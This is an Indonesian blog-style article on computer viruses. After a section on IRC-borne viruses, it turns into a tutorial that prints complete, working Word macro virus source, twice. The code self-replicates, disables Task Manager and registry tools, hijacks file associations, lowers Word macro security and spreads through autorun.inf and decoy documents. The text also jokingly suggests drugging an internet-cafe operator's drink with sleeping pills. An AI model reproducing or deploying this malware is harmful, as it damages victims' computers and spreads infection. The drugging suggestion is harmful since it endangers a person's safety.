Bubuhi obat penidur pada minuman tsb td. Tawari operatornya, nah kalo sdh tertidur…. kamu ajak deh teman2 sekampus ato seangkatanmu… INGAT… sebelum operatornya sadar kamu harus buru2 kabur…
he he he he…

VIRUS & INTERNET

K lo membicarakan tentang virus pasti kita juga akan membicarakan internet, Mengapa? Karena kebanyakan virus yang telah beradaptasi dengan dunia menggunakan internet sebagai media penyebarannya, tidak hanya menggunakan media penyebaran floppy atau flashdisk seperti yang telah dilakukan pada virus-virus lokal kebanyakan.

Banyak virus yang menyebarkan dirinya lewat internet misalnya: W32/Emmareg.A yang mecoba menyebar melalui email dengan mengirimkan [reply] semua email yang ada di INBOX dengan menyertakan attachment NOVA.SCR. W32/VBWorm.MLG yang memalsukan diri sebagai PCMAV antivirus RC9 meminta kita untuk percaya dan mendownload virus tersebut. W32/Viking.GU yang mengakibatkan traffic jaringan menjadi padat hal ini dikarenakan Viking mencoba untuk melakukan ping request dengan melakukan scan terhadap semua IP yang terdapat dalam subnet lokal yang ada di dalam jaringan tersebut hal ini ditambah lagi dengan aksi lainnya dengan mencoba untuk mengkopikan dirinya ke komputer target serta menginfeksi file yang mempunyai ekstensi EXE.


Baru-baru ini saja ada virus Anjelina Jolie(W32/Agent.GPKB) yang mengirimkan e-mail berisi tawaran untuk memperoleh video syur FREE alias Gratis dengan embel-embel seakan-akan email tersebut merupakan Fitur dari Microsoft MSN. Lalu versi ke 2 dari virus Anjelina Jolie ini yaitu Anjelina Jolie II (W32/ DLoader.ITOA ) yang akan memalsukan isi berita dari CNN dan MSNBC . Virus ini dikategorikan sebagai Spyware dan mempunyai ciri-ciri yang tidak jauh dengan pendahulunya (Agent.GPKB), virus ini juga akan men- download sebuah program lain sama seperti pendahulunya yakni antivirus XP 2008 yang secara otomatis akan langsung di install di komputer korban . Anjelina Jolie II ini menyebarkan email dari Daily Top 10 dengan subject CNN.comDaily Top 10, harap berhati-hati apalagi jika diminta untuk download sebuah file dengan nama get_flash_update.exe pada saat anda klik salah satu berita dalam bentuk vidoe yang di sertakan pada email tersebut .


Saat saya lagi main-main ke warnet untuk mencari suasana sambil memandangi kecantikan penjaga warnetnya ternyata saya pulang dengan membawa oleh-oleh sebuah file.vbs yang berisi kode-kode untuk menggandakan diri dan menyebarkan dirinya melalui internet koding penyebaran internetnya dapat dilihat pada gambar berikut:



Dari kode diatas dapat saya tarik kesimpulan bahwa virus ini akan membuat suatu file bernama script.ini yang berfungsi memasuki channel yang telah diketahui dan mengirimkan nick berupa nama dari virus tersebut. Kode tersebut sangat terlihat bahwa virus ini menyebarkan diri lewat internet (khusunya IRC).

Mengapa memilih IRC sebagai media penyebarannya? Karena IRC memiliki kelebihan penulisan perintah-perintah DCC. File tersebut di set secara automatic sehingga virus tersebut dapat diantar melalui DCC.

IRC mempunyai sistem untuk menerima atau menolak file yaitu dengan menuliskan perintah /dccallow +nama pengantar, yang akan membenarkan anda menerima file itu. Oleh karena penyebaran virus tiap- tiap hari di DALnet, DALnet mempunyai satu fungsi yang membatas penghantaran DCC bagi fail dengan koneksi ("js", "pl","exe", "com", "bat", "dll", "ini", "vbs", "pif", "mrc", "scr", "doc", "xls", "lnk", "shs", "htm", "html"). Untuk mendapatkan file tersebut, Unit Kod DALnet telah menambahkan perintah DCCallow. Perintah DCCallow ,yaitu dengan menuliskan

Syntax: /quote dccallow +/-nickname,Informasi: +/-nama_samaran mesti dinyatakan untuk anda menyatakan siapa yang anda izinkan menghantar DCC kepada anda. Jadi anda dapat menentukan sendiri orang-orang yang anda percaya dalam mengirimkan file.

Jika anda menggunakan IRC, Kerap kali anda akan mengalami masalah pengguna IRC yang mencoba menghantar file virus dan trojan. File- file tersebut misalnya Movie.avi.pif, Links.vbs dll. Ada juga file berupa 'backdoors'.Jika file tersebut dipanggil, ia bisa memberi laluan tanpa izin kepada pengguna yang tidak bertanggung jawab untuk meng-exploit dan dan merusak komputer anda.


Anda hanya bisa mengatasi masalah ini dengan menetapkan opsyen DCC anda kepada 'ignore'.




Dengan melihat file mirc.ini yang berisi daftar file yang diterima(lolos) ataupun yang ditolak(tidak diloloskan) seorang virus_maker(vm) yang biasa mencari celah-celah keamanan pun dapat membuat duplikat dari file ini dengan menambah daftar file yang diterima(lolos) dengan ekstensi-ekstensi virus buatannya misal dalam daftar accept ditambah dengan*.exe,*.vbs


Sehingga serangan dari virus_maker akan berjalan jauh lebih lancar dengan dibukanya celah tersebut


Dan saran dari ku buat penguna IRC,Jangan terima fail DCC dari orang yang tidak anda kenal,karna orang yang tidak anda kenal, atau tidak anda percaya tersebut bisa saja memberikan file berisi virus atau trojan.


Seperti tidak mau kalah rieysha juga membuat virus yang berjalan di IRC virus ini di buat dengan delphi.



Intinya sama dengan virus .vbs diawal yaitu virus akan membuat suatu file bernama script.ini yang berfungsi memasuki channel yang telah diketahui dan mengirimkan nick berupa nama dari virus tersebut dan menjalankan file virus tersebut (perintah run)

Sekali lagi saya ingatkan virus hanyalah program biasa bikinan manusia biasa, dengan selalu berhati-hati dan melakukan pencegahan-pencegahan anda yang jauh lebih pintar pasti tidak akan gentar menghadapinya hehehehe…

Tehnik Membuat Virus Macro

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)



Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro... (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….
Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO



  1. Buka Ms.Word (hanya contoh)

  2. buka tools > Macro> Visual Basic Editor






  • Akan muncul gambar di bawah




Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.







Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

Tenang, aku dah siapkan kok sourcenya. Makan neh source code!

'This is my code's virus

'

'Fuck Gates. Your software has small weakness. Watch it!

'

'Macro Viruses


'[Macroid]


'


'Hanya untuk pembelajaran



Private Sub Document_Close()


Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)



If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If



If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If



If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If



On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"



On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"



If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a



If Dir(Environ$("windir") & "\Macroid.doc") = "" Then


Dim isicrita As String


isicrita = "[Macroid] by Adnan" & vbCrLf & "Copyright(c) Sinjai Juli-2009" & vbCrLf & vbCrLf & _


Chr(34) & "Ms.Word is a thing that can be used as a power to break everything.... " & Chr(34) & vbCrLf & "(Morphic)"


Open Environ$("windir") & "\Macroid.doc" For Output As #1


Print #1, isicrita


Close #1


End If



If Dir(Environ$("windir") & "\avmc.vbs") = "" Then


Open Environ$("windir") & "\avmc.vbs" For Output As #1


Print #1, "set fs = createobject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"


Print #1, "for each FD in fs.drives"


Print #1, "if (FD.Drivetype = 1) and FD.Path <> " & Chr(34) & "A:" & Chr(34) & " then"


Print #1, "set tf = fs.CreateTextFile(FD.Path" & Chr(38) & Chr(34) & "\Jangan di baca.doc" & Chr(34) & ")"


Print #1, "end if"


Print #1, "Next"


Close #1


End If


ActiveDocument.Save


NormalTemplate.Save


End Sub



Private Sub Document_Open()


CommandBars("Tools").Controls("Macro").Visible = False


CommandBars("Tools").Controls("Macro").Enabled = False


CommandBars("Tools").Controls("Customize...").Visible = False


CommandBars("Tools").Controls("Options...").Visible = False



Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)



If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If



If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If



If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If



On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"



On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"



If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a



End Sub




Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg....... Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.




EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI









Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!


Jawabannya lihat di bawah!!